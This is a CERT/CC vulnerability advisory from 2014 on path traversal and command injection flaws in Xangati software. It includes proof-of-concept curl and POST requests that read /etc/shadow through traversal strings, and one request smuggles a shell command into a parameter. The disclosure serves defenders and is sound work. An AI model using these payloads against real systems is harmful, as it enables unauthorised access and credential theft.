search menu icon-carat-right cmu-wordmark

CERT Coordination Center

Xangati software release contains relative path traversal and command injection vulnerabilities

Vulnerability Note VU#657622

Original Release Date: 2014-04-14 | Last Revised: 2014-04-14

Overview

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

Description

Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.

CWE-23: Relative Path Traversal - CVE-2014-0358
The reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5

POST /servlet/MGConfigData HTTP/1.1
key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/Installer'

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \
'hxxps://127.10.10.5/servlet/MGConfigData'

CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359
The reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability.

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
'hxxps://127.10.10.5/servlet/Installer'

The CVSS score below is for CVE-2014-0359.

Impact

A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.

Solution

Apply an Update

Upgrade to XSR11 or XNR 7 for the appropriate product..

Vendor Information

657622
 
Affected   Unknown   Unaffected

Xangati Inc

Notified:  January 23, 2014 Updated:  April 11, 2014

Status

  Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group Score Vector
Base 9.4 AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal 8.2 E:ND/RL:OF/RC:C
Environmental 2.1 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Jan Kadijk for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

CVE IDs: CVE-2014-0358, CVE-2014-0359
Date Public: 2014-04-14
Date First Published: 2014-04-14
Date Last Updated: 2014-04-14 20:30 UTC
Document Revision: 11

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.